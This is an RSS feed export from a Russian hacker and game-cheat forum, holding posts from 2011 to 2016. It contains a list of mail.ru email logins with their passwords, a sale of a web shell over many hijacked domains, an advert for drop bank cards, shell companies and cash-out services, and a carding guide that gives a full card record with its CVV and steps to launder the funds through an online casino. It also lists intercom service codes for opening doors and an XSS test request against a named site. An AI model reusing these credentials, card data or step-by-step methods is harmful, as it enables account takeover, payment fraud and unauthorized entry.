<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://indogohacker.forumbb.ru/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>ПОРТАЛ ЧИТОВ ДЛЯ ИГР</title>
		<link>http://indogohacker.forumbb.ru/</link>
		<description>ПОРТАЛ ЧИТОВ ДЛЯ ИГР</description>
		<language>ru-ru</language>
		<lastBuildDate>Sun, 03 Jul 2016 22:31:22 +0300</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>Бесплатные скины CS GO</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=92#p92</link>
			<description>&lt;p&gt;Бесплатные скины CS GO &lt;a href=&quot;http://goo.gl/h5d0Gp&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://goo.gl/h5d0Gp&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Вася12)</author>
			<pubDate>Sun, 03 Jul 2016 22:31:22 +0300</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=92#p92</guid>
		</item>
		<item>
			<title>Флудилка №1</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=91#p91</link>
			<description>&lt;p&gt;Слил инфу с кардинг форума&lt;br /&gt;&lt;a href=&quot;https://youtu.be/vn63Ua9heU4&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://youtu.be/vn63Ua9heU4&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;https://www.youtube.com/watch?v=YT9_En-&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://www.youtube.com/watch?v=YT9_En-&lt;/a&gt; … e=youtu.be&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Вася12)</author>
			<pubDate>Sun, 03 Jul 2016 22:28:29 +0300</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=91#p91</guid>
		</item>
		<item>
			<title>Боты Майл</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=90#p90</link>
			<description>&lt;p&gt;Боты для игр и.т.п &lt;br /&gt;Убедительная просьба не менять пароли=)&lt;/p&gt;
						&lt;p&gt;vam.pizda.ot.ard_2@mail.ru;ardeshniki&lt;br /&gt;vam.pizda.ot.ard_3@mail.ru;ardeshniki&lt;br /&gt;vam.pizda.ot.ard_4@mail.ru;ardeshniki&lt;br /&gt;vam.pizda.ot.ard_5@mail.ru;ardeshniki&lt;br /&gt;vam.pizda.ot.ard_6@mail.ru;ardeshniki&lt;br /&gt;vam.pizda.ot.ard_7@mail.ru;ardeshniki&lt;br /&gt;vam.pizda.ot.ard_8@mail.ru;ardeshniki&lt;br /&gt;vam.pizda.ot.ard_9@mail.ru;ardeshniki&lt;br /&gt;vam.pizda.ot.ard_10@mail.ru;ardeshniki&lt;br /&gt;vam.pizda.ot.ard_11@mail.ru;ardeshniki&lt;br /&gt;vam.pizda.ot.ard_12@mail.ru;ardeshniki&lt;br /&gt;vam.pizda.ot.ard_13@mail.ru;ardeshniki&lt;br /&gt;vam.pizda.ot.ard_14@mail.ru;ardeshniki&lt;br /&gt;vam.pizda.ot.ard_15@mail.ru;ardeshniki&lt;br /&gt;vam.pizda.ot.ard_16@mail.ru;ardeshniki&lt;br /&gt;vam.pizda.ot.ard_17@mail.ru;ardeshniki&lt;br /&gt;vam.pizda.ot.ard_18@mail.ru|ardeshniki&lt;br /&gt;vam.pizda.ot.ard_19@mail.ru;qwertasdf12&lt;br /&gt;vam.pizda.ot.ard_20@mail.ru;qwertasdf12&lt;br /&gt;vam.pizda.ot.ard_21@mail.ru;qwertasdf12&lt;br /&gt;vam.pizda.ot.ard_22@mail.ru;qwertasdf12&lt;br /&gt;vam.pizda.ot.ard_23@mail.ru;qwertasdf12&lt;br /&gt;vam.pizda.ot.ard_24@mail.ru;qwertasdf12&lt;br /&gt;vam.pizda.ot.ard_25@mail.ru;qwertasdf12&lt;br /&gt;vam.pizda.ot.ard_26@mail.ru;ardeshniki&lt;br /&gt;vam.pizda.ot.ard_27@mail.ru;ardeshniki&lt;br /&gt;utel-100-4@mail.ru;qaqa&lt;br /&gt;utel-100-5@mail.ru;qaqa&lt;br /&gt;utel-100-6@mail.ru;qaqa&lt;br /&gt;utel-100-4@mail.ru;qaqa&lt;br /&gt;utel-100-5@mail.ru;qaqa&lt;br /&gt;utel-100-6@mail.ru;qaqa&lt;br /&gt;utel-100-9@mail.ru;qaqa&lt;br /&gt;utel-100-10@mail.ru;qaqa&lt;br /&gt;utel-100-12@mail.ru;qaqa&lt;br /&gt;utel-100-13@mail.ru;qaqa&lt;br /&gt;utel-100-14@mail.ru;qaqa&lt;br /&gt;utel-100-15@mail.ru;qaqa&lt;br /&gt;utel-100-16@mail.ru;qaqa&lt;br /&gt;utel-100-17@mail.ru;qaqa&lt;br /&gt;utel-100-18@mail.ru;qaqa&lt;br /&gt;utel-100-19@mail.ru;qaqa&lt;br /&gt;utel-100-20@mail.ru;qaqa&lt;br /&gt;utel-100-21@mail.ru;qaqa&lt;br /&gt;utel-100-24@mail.ru;qaqa&lt;br /&gt;utel-100-25@mail.ru;qaqa&lt;br /&gt;utel-100-26@mail.ru;qaqa&lt;br /&gt;utel-100-27@mail.ru;qaqa&lt;br /&gt;utel-100-28@mail.ru;qaqa&lt;br /&gt;utel-100-29@mail.ru;qaqa&lt;br /&gt;utel-100-30@mail.ru;qaqa&lt;br /&gt;utel-100-31@mail.ru;qaqa&lt;br /&gt;utel-100-32@mail.ru;qaqa&lt;br /&gt;utel-100-33@mail.ru;qaqa&lt;br /&gt;utel-100-34@mail.ru;qaqa&lt;br /&gt;utel-100-35@mail.ru;qaqa&lt;br /&gt;utel-100-37@mail.ru;qaqa&lt;br /&gt;utel-100-38@mail.ru;qaqa&lt;br /&gt;utel-100-39@mail.ru;qaqa&lt;br /&gt;utel-100-41@mail.ru;qaqa&lt;br /&gt;utel-100-42@mail.ru;qaqa&lt;br /&gt;utel-100-43@mail.ru;qaqa&lt;br /&gt;utel-100-44@mail.ru;qaqa&lt;br /&gt;utel-100-45@mail.ru;qaqa&lt;br /&gt;utel-100-46@mail.ru;qaqa&lt;br /&gt;utel-100-47@mail.ru;qaqa&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Fokys$s)</author>
			<pubDate>Sun, 08 Jul 2012 10:30:46 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=90#p90</guid>
		</item>
		<item>
			<title>Скрипт на морской бой</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=88#p88</link>
			<description>&lt;p&gt;хоть и старый но до сих пор рабочий скрипт для морского боя, даёт возможность стрелять на девять клеток, не разу не подводил, одна проблема надо чистить кеш каждый день ибо игра будет зависать&amp;#160; CCleaner вам в помощь.&lt;br /&gt;скачать бесплатно &lt;a href=&quot;http://webfile.ru/6029362&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://webfile.ru/6029362&lt;/a&gt;&lt;br /&gt;Играть можно ради развлечения, не стоит набирать рейтинг так как&amp;#160; игроки бушуют от удивления и админы очень наблюдательны и обнуляют до стандартного рейтинга 1700 &lt;br /&gt;Так-же работаю над скриптом который будет бить сразу на 100 клеток , автор данного скрипта есть но секрета не раскрывает&amp;#160; работаю вроде успешно ждите...&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Fokys$s)</author>
			<pubDate>Sun, 08 Jul 2012 10:23:51 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=88#p88</guid>
		</item>
		<item>
			<title>Всеми известная рулетка в играх майл</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=87#p87</link>
			<description>&lt;p&gt;С помощью данного скрипта вы сможете крутить колесо фортуны каждую минуту, скрипт проверен лично мою к счастью он всё еще актуален!&lt;br /&gt;Руководство по установки &lt;br /&gt;1.Скачиваете и устанавливаете Сharles (&lt;a href=&quot;http://www.charlesproxy.com/download/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.charlesproxy.com/download/&lt;/a&gt;)&lt;br /&gt;2.Скачиваете и устанавливаете Java (для работоспособности Charles), выбираете под свою ОС(операционную систему)&lt;br /&gt;3.Заходите в Charles--&amp;gt;Proxy и там ставите галочки напротив Windows Proxy,Mozilla Firefox Proxy и Recording(Session1)&lt;br /&gt;4.Затем жмем Tools--&amp;gt;Rewrite, и в открывшемся окне слева жмем Enable Rewrite&lt;br /&gt;5.Теперь жмем на кнопку Import и импортируем все скрипты с названиями ____.xml, после жмем Apply--&amp;gt;Ok ( не забудте проверить все ли галочки стоят напротив скриптов)&lt;br /&gt;6.Теперь заходим через Firefox в игры mail.ru и наслаждаемся игрой&lt;br /&gt;Скачать тут &lt;a href=&quot;http://webfile.ru/6029347&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://webfile.ru/6029347&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Fokys$s)</author>
			<pubDate>Sun, 08 Jul 2012 10:02:57 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=87#p87</guid>
		</item>
		<item>
			<title>Очень вкусный шелл</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=86#p86</link>
			<description>&lt;p&gt;&lt;a href=&quot;http://www.radikal.ru&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://i081.radikal.ru/1204/b9/312633f8e3b6.jpg&quot; alt=&quot;http://i081.radikal.ru/1204/b9/312633f8e3b6.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.radikal.ru&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://s019.radikal.ru/i605/1204/b6/bbbb2b8b6996.jpg&quot; alt=&quot;http://s019.radikal.ru/i605/1204/b6/bbbb2b8b6996.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.radikal.ru&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://s019.radikal.ru/i620/1204/2f/c0f30cb83fff.jpg&quot; alt=&quot;http://s019.radikal.ru/i620/1204/2f/c0f30cb83fff.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.radikal.ru&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://s019.radikal.ru/i631/1204/9b/789d626375a7.jpg&quot; alt=&quot;http://s019.radikal.ru/i631/1204/9b/789d626375a7.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.radikal.ru&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://s57.radikal.ru/i157/1204/0a/501cc2a4a4a0.jpg&quot; alt=&quot;http://s57.radikal.ru/i157/1204/0a/501cc2a4a4a0.jpg&quot; /&gt;&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;и еще 11 доменов в зоне рф с общим тицем 7230.&lt;/p&gt;
						&lt;p&gt;- итого суммарный тиц около &lt;span style=&quot;color: Red&quot;&gt;27 тысяч&lt;/span&gt;. &lt;br /&gt;- большая часть доменов зарегана давно, есть 97, 98, 99 и тд года&lt;br /&gt;- на серваке по многим папкам нельзя определить точный домен сайта, постоянно нахожу через сервисы по определению сайтов на одном ip новые домены. З.Ы. нашел на шелле сервак яндекса&lt;br /&gt;- Safe mode: OFF&lt;br /&gt;- качалки и архиваторы присутствуют.&lt;br /&gt;- в системах учета трафика зарегано только 15-20 сайтов, суммарная посещалка у них более 150к уников в месяц, на остальных неизвестно. &lt;br /&gt;- в одни руки, строго через гаранта.&lt;/p&gt;
						&lt;p&gt;- ICQ 245919&lt;/p&gt;</description>
			<author>mybb@mybb.ru (velikiyrim)</author>
			<pubDate>Wed, 04 Apr 2012 11:52:45 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=86#p86</guid>
		</item>
		<item>
			<title>Как Создать Таблетку К играм Тупые Ответы И Ответы не по тебе Неприним</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=85#p85</link>
			<description>&lt;p&gt;Привет всем я ищу кого нить кто поможет или научит меня созданию таблеток к играм! мой скайп Yarik_956 мой контакт &lt;a href=&quot;http://vkontakte.ru/id70169664&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/id70169664&lt;/a&gt; моя почта S_talker_95@mail.ru! НО ЛУЧШЕ ВСего НА ПИШИТЕ В СкаЙП ну и конечно можете писать сюда на форум!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (VeGaS955)</author>
			<pubDate>Thu, 01 Dec 2011 19:18:18 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=85#p85</guid>
		</item>
		<item>
			<title>ХАККИНГ</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=82#p82</link>
			<description>&lt;p&gt;всем доброго время суток,у меня вот какой вопрос вчера я&amp;#160; вечером сканировал один сайт прогой XSpide,и получил вот такое Сервер DNS поддерживает рекурсию запросов. При определенных обстоятельствах возможна DoS-атака на сервер. &lt;br /&gt; Решение &lt;/p&gt;
						&lt;p&gt; Разрешить рекурсию только для доверенных адресов. &lt;br /&gt; Ссылки &lt;/p&gt;
						&lt;p&gt; CVE (CVE-1999-0024) : &lt;a href=&quot;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0024&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://cve.mitre.org/cgi-bin/cvename.cg &amp;#8230; -1999-0024&lt;/a&gt; ПОТОМ ИДЕТ ВОТ ТАКОЕ&amp;#160; Доступна информация &lt;br /&gt;Список cookie &lt;br /&gt; Описание &lt;/p&gt;
						&lt;p&gt; 1. PHPSESSID=vp84mdore5ehdffi6qt8kjrn33; path=/ &lt;br /&gt;2. uno=1; expires=Tue, 31-Jan-2012 04:31:24 GMT; path=/ &lt;br /&gt;3. sait=5; expires=Tue, 31-Jan-2012 04:31:24 GMT; path=/ &lt;/p&gt;
						&lt;p&gt;ПОТОМ ВОТ ТАКАЯ ИДЕТ ИНФА&amp;#160; Уязвимость &lt;br /&gt;Межсайтовый скриптинг %s &lt;br /&gt; Описание &lt;/p&gt;
						&lt;p&gt; Возможно выполнение атаки межсайтовый скриптинг. Межсайтовый скриптинг (Cross site scripting или XSS) это возможность вставки HTML кода в уязвимую страницу. Инъекция кода осуществляется через все доступные способы ввода информации. Успешное завершение атаки может привести к использованию значений различных переменных, доступных в контексте сайта, записи информации, перехвату пользовательских сессий и т.д. &lt;/p&gt;
						&lt;p&gt;Запрос для выполнения атаки: &lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://SEXY-VK.RU/register/?idw1=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://SEXY-VK.RU/register/?idw1=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&#039;PTsecurity Scanner Test&#039;)&amp;lt;/script&amp;gt;&amp;lt;&amp;quot;&lt;/a&gt; &lt;/p&gt;
						&lt;p&gt; Решение &lt;/p&gt;
						&lt;p&gt; Запретить использование этого скрипта или программно исправить ошибку. &lt;br /&gt; Ссылки &lt;/p&gt;
						&lt;p&gt; &lt;a href=&quot;http://www.cgisecurity.com/articles/xss-faq.shtml&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.cgisecurity.com/articles/xss-faq.shtml&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.cert.org/advisories/CA-2000-02.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.cert.org/advisories/CA-2000-02.html&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://support.microsoft.com/default.aspx?scid=kb;EN-US;q252985&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://support.microsoft.com/default.as &amp;#8230; US;q252985&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://httpd.apache.org/info/css-security/apache_specific.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://httpd.apache.org/info/css-securi &amp;#8230; cific.html&lt;/a&gt; &lt;br /&gt;ОБЪЯСНИТЕ КАК ЭТИМ ПОЛЬЗЫВАТЬСЯ ВСЕМ Я ТОЛЬКО НАЧИНАЮ ПОСТИГАТЬ АЗЫ!!!&amp;#160; &amp;#160;Доступна информация &lt;br /&gt;Ссылки с параметрами &lt;br /&gt; Описание &lt;/p&gt;
						&lt;p&gt; Список ссылок найденных на веб-сервере, которые используют какие-либо параметры: &lt;/p&gt;
						&lt;p&gt;/register/?idw1=3242664 &lt;/p&gt;
						&lt;p&gt;/ts.php?p_id=910&amp;amp;lol=5 &lt;/p&gt;
						&lt;p&gt;/register/?idw=3242664 &lt;/p&gt;
						&lt;p&gt;/id/?id=0&amp;amp;f=meets&amp;amp;m=3 &lt;/p&gt;
						&lt;p&gt;/register/?f=friends &lt;/p&gt;
						&lt;p&gt;/register/?send1=1 &lt;/p&gt;
						&lt;p&gt;/register/?send=1 &lt;/p&gt;
						&lt;p&gt;/id/?id=0&amp;amp;idw2=0 &lt;/p&gt;
						&lt;p&gt;/id/?id=0&amp;amp;idw3=0 &lt;/p&gt;
						&lt;p&gt;/id/?id=0&amp;amp;idw1=0 &lt;/p&gt;
						&lt;p&gt;/id/?id=0&amp;amp;idw4=0 &lt;/p&gt;
						&lt;p&gt;/id/?id=0&amp;amp;idw=0 &lt;/p&gt;
						&lt;p&gt;/id/?id=4993558 &lt;/p&gt;
						&lt;p&gt;/cool/?id=12037 &lt;/p&gt;
						&lt;p&gt;/?idw1=1103848 &lt;/p&gt;
						&lt;p&gt;/?idw=1103848 &lt;/p&gt;
						&lt;p&gt;/id/?id=&amp;amp;f=5 &lt;/p&gt;
						&lt;p&gt;/?f=friends &lt;/p&gt;
						&lt;p&gt;/?send1=1 &lt;/p&gt;
						&lt;p&gt;/?send=1 &lt;/p&gt;
						&lt;p&gt;/id/?f=1 &lt;/p&gt;
						&lt;p&gt;/id/?i&lt;/p&gt;</description>
			<author>mybb@mybb.ru (LogDoG80)</author>
			<pubDate>Fri, 07 Oct 2011 15:12:11 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=82#p82</guid>
		</item>
		<item>
			<title>ФОРУМ!</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=81#p81</link>
			<description>&lt;p&gt;я бы взял твой сайт в свои руки!!! :-)&lt;/p&gt;</description>
			<author>mybb@mybb.ru (LogDoG80)</author>
			<pubDate>Fri, 07 Oct 2011 14:20:19 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=81#p81</guid>
		</item>
		<item>
			<title>СКРИПТ ДЛЯ САЙТА,ФОРУМА.</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=80#p80</link>
			<description>&lt;p&gt;Афтору больое спасибо за статейку и скрипты!!! :-)&lt;/p&gt;</description>
			<author>mybb@mybb.ru (LogDoG80)</author>
			<pubDate>Fri, 07 Oct 2011 14:13:50 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=80#p80</guid>
		</item>
		<item>
			<title>Дебетовые ATM карты, ООО/ИП, электронные кошельки, обнал EM.</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=78#p78</link>
			<description>&lt;p&gt;Дебетовые ATM карты. В наличии всегда много карт различных банков, таких как Альфа, Сбербанк, ВТБ, Юникредит и др. Все карты в полном комплекте и готовы к работе. Работайте с нами.&lt;br /&gt;Юр. Лица. Предоставим для Вашей работы ООО и ИП с открытыми счетами. Беремся за заказы любой сложности.&lt;br /&gt;Электронные деньги. Продаем кошельки WM, ЯД, qiwi, РБК любые другие на третьих лиц. Связка кошелек+ ATM карта, для удобного анонимного вывода денег. Покупка электронных денег за нал (только для Москвы). Обналичивание Ваших средств, разблокировка кошельков, перевод средств. Работаем с любыми системами России и мира. Обналичивание средств с сим-карт операторов РФ (не фрод).&lt;br /&gt;Доставка заказа в любую точку РФ за наш счет. По Москве курьер.&lt;br /&gt;РАБОТАЕМ БЕЗ ПРЕДОПЛАТЫ или через гарантов авторитетных форумов. Денег вперед не просим. Предоставим ссылки на отзывы с уважаемых ресурсов. Контакты: скайп remaker001, icq 246262074, жаббер remaker001@jabber.ru&lt;/p&gt;</description>
			<author>mybb@mybb.ru (l1919s2011)</author>
			<pubDate>Tue, 27 Sep 2011 15:36:16 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=78#p78</guid>
		</item>
		<item>
			<title>Способы добычи голосов Вконтакте</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=76#p76</link>
			<description>&lt;p&gt;&lt;strong&gt;-=PRELIATUS=-&lt;/strong&gt;&lt;br /&gt;помоги найти баги в онлайн игре darorbit а то играть нубм надоело&lt;/p&gt;</description>
			<author>mybb@mybb.ru (DeMoN)</author>
			<pubDate>Sun, 12 Jun 2011 00:23:31 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=76#p76</guid>
		</item>
		<item>
			<title>РАДМИН СКРЫТЫЙ (под видом бесплатные подарки в одноклассниках)</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=74#p74</link>
			<description>&lt;p&gt;Файлов на обменнике нет&amp;#160; :angry: Ни одного радмина!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (maloir)</author>
			<pubDate>Mon, 30 May 2011 20:28:49 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=74#p74</guid>
		</item>
		<item>
			<title>ВЗЛОМ компьютера через radmin и варуем пароли на интернет WEBSTREAM</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=73#p73</link>
			<description>&lt;p&gt;%-)&lt;/p&gt;</description>
			<author>mybb@mybb.ru (-=Blondex=-)</author>
			<pubDate>Fri, 13 May 2011 05:07:11 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=73#p73</guid>
		</item>
		<item>
			<title>Кардинг для начинающих</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=64#p64</link>
			<description>&lt;p&gt;Не буду говорить насчет безопасноти. &lt;br /&gt;Просто напомню что она ооочень важна!!! &lt;br /&gt;И незщищенным в эту тему лезть черевато!&lt;/p&gt;
						&lt;p&gt;Во вторых не буду расматривать карж stema.&lt;/p&gt;
						&lt;p&gt;В третьих напомню что кардинг - это приступление.&lt;/p&gt;
						&lt;p&gt;Допустим вы достали кредитку.(купили, выпросили, нафишили и т.д.)&lt;/p&gt;
						&lt;p&gt;Расмотрим чо к чему в этом наборе букв и цифр:&lt;/p&gt;
						&lt;p&gt;Erik | Kaymin | 711B Seagirt Av #20L | Metfield |MA|USA | 02052 | 6011002622544211 | 0112 | 825 | &lt;br /&gt;&amp;#160; &lt;br /&gt;По порядку: &lt;br /&gt;1 и 2 – Имя владельца карты &lt;br /&gt;3 и 4 и 5 Адрес, город, Штат &lt;br /&gt;6 – страна (В данном случае пиндосы) &lt;br /&gt;7 – зип код (Аля индекс) &lt;br /&gt;8 – НОМЕР КАРТЫ &lt;br /&gt;9 – «использовать до» &lt;br /&gt;10 – CVV код&lt;/p&gt;
						&lt;p&gt;Тепрь как срубить с нее денег:&lt;/p&gt;
						&lt;p&gt;Идем в онлайн казино (не в зоне ру! желательно какое ни будь амрикосовское) в гугле найдете.&lt;/p&gt;
						&lt;p&gt;далее, заходим на него через прокси штата указаного на картоне. &lt;br /&gt;В компе все настройки меняем под тот штат через который заходим (время, страна и тд.) (желательно при этом заходить с виртуального копма, установить на нем анголоизычную версию винды, ну и софт весть на английском(или той страны чья креда))&lt;/p&gt;
						&lt;p&gt;регистрируемся в козено, мыло нужно не взоне ру (например яху.ком), желатьльно очень похожее на мыло указаное в креде.&lt;/p&gt;
						&lt;p&gt;далее переходим на пополнение щета. вбиваем всю инфу что у нас требуют. Подтверждаем(обычно если суммы небольшие(до 500 зеленых) подтвердить можно через майл или вобще могут его неспросить)&lt;/p&gt;
						&lt;p&gt;К нам приходят деньги и начинаем играть!&lt;br /&gt;Поднять в казино сумму раза в два в три больше введенной не так уж сложно, тем более когда играешь не на свои)))&lt;/p&gt;
						&lt;p&gt;Переводим обратно на креду сумму которую от туда взяли, остальное выводим на свой щет)))&lt;/p&gt;
						&lt;p&gt;Ну вот впринципе и все))&lt;/p&gt;
						&lt;p&gt;Внимание!!! Статья написана чисто в позновательных целях и не является руководством к действию! Автор не несет ни какой ответствинности за использование этого материала!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (-=PRELIATUS=-)</author>
			<pubDate>Fri, 01 Apr 2011 17:52:08 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=64#p64</guid>
		</item>
		<item>
			<title>Взлом домофонов</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=63#p63</link>
			<description>&lt;p&gt;Вот стало интересно есть ли способоы на взлом домофона - т.е. Общий Код для входа &lt;br /&gt;Или просто для ошибок - (помница набирали цифры в разном порядке и ппц....) &lt;br /&gt;Ну всё , что реально знаете про них и про то как шутить прошу отписать. &lt;br /&gt;Сорри если это уже обсуждалось - в поиске по разделу фрика ненашел! &lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;у меня стоит домофон фирмы Метаком &lt;br /&gt;кстати вот щас пока искал - случайно наткнулся на статейку по взлому домофонов - вот: &lt;br /&gt;1. Марка домофона - Raikmann. Можешь спать спокойно - такой домофон юный кул-хацкер будет ломать очень долго (до приезда мусоров...). &lt;/p&gt;
						&lt;p&gt;2. Марка домофона - Rainmann. (Rainmann 2000 etc. и другие). Таких домофонов очень и очень много. Во всех новостройках или в тех домах, где меняли домофон, стоят именно эти модели. В принципе они аналоги Raikmann&amp;#180;ов, только подешевле. Вот о них родимых и пойдет речь... Итак по порядку. Нажимаешь кнопочку &amp;quot;ключ&amp;quot; и вводишь 9 8 7 6 5 4 , должен послышаться двойной звуковой сигнал. Затем вводи 1 2 3 4 5 6 , появится буква &amp;quot;P&amp;quot;. Ты вошел в систему управления домофоном. Теперь запоминай: &lt;br /&gt;&amp;quot;1&amp;quot; Расширенные настройки домофона, советую самому там не копаться, а просто войти в эту менюшку, и идти попивать пЫво неподалеку. Озадаченные жильцы сделают все за вас. &lt;/p&gt;
						&lt;p&gt;&amp;quot;2&amp;quot; Обычные настройки домофона. &lt;/p&gt;
						&lt;p&gt;&amp;quot;3&amp;quot; Подача сигнала. &lt;/p&gt;
						&lt;p&gt;&amp;quot;4&amp;quot; Блокировка двери. &lt;/p&gt;
						&lt;p&gt;&amp;quot;5&amp;quot; ???? &lt;/p&gt;
						&lt;p&gt;&amp;quot;6&amp;quot; ???? &lt;/p&gt;
						&lt;p&gt;&amp;quot;7&amp;quot; ???? &lt;/p&gt;
						&lt;p&gt;&amp;quot;8&amp;quot; Открыть дверь. &lt;/p&gt;
						&lt;p&gt;&amp;quot;9&amp;quot; ???? &lt;/p&gt;
						&lt;p&gt;Это все конечно хорошо, а что делать если ты пришел домой, а там горит &amp;quot;P&amp;quot;. Ничо страшного - просто нажми &amp;quot;DEL&amp;quot; (в некоторых домофонах &amp;quot;C&amp;quot;), если после &amp;quot;P&amp;quot; горит какая либо цифра, нажми &amp;quot;DEL&amp;quot; + &amp;quot;Эта цифра&amp;quot;. После этого домофон будет работать в обычном режиме. &lt;/p&gt;
						&lt;p&gt;FAQ по взлому домофонов: &lt;/p&gt;
						&lt;p&gt;Q: Как сделать клон трубки? &lt;br /&gt;A: Открой корпус трубы, тама стоит нескока джамперов, которые устанавливают номер квартиру, в коророй установлена трубка (актуально для Rainkman). &lt;/p&gt;
						&lt;p&gt;Q: Как войти в сервисное меню домофона Cifral? &lt;br /&gt;A: Нажать любую цифру и держать до появления надписи, затем ввести инженерный код. &lt;/p&gt;
						&lt;p&gt;Q: Как войти в системное меню домофона Cifral? &lt;br /&gt;A: Нажать звонок и держать до появления надписи, затем ввести инженерный код. &lt;/p&gt;
						&lt;p&gt;Q: Как войти в сервисное меню домофона Rainmann (Rainmann 2000 etc. и другие)? &lt;br /&gt;A: Нажимаешь кнопочку «ключ» и вводишь 9 8 7 6 5 4 , должен послышаться двойной звуковой сигнал. Затем вводи 1 2 3 4 5 6 , появится буква P. Ты вошел в систему управления домофоном. Теперь запоминай: &lt;br /&gt;1 — Расширенные настройки домофона, советую самому там не копаться, а просто войти в эту менюшку, и идти попивать пЫво неподалеку. Озадаченные жильцы сделают все за вас. &lt;br /&gt;2 — Обычные настройки домофона. &lt;br /&gt;3 — Подача сигнала. &lt;br /&gt;4 — Блокировка двери. &lt;br /&gt;5 — ???? &lt;br /&gt;6 — ???? (домофон виснет) &lt;br /&gt;7 — ???? &lt;br /&gt;8 — Открыть дверь. &lt;br /&gt;9 — ???? &lt;br /&gt;Это действует если только настройки не трогали, вместо 987654 может быть другой код. &lt;br /&gt;Пашет на домофонах где на экранчике точка стоит слева. &lt;/p&gt;
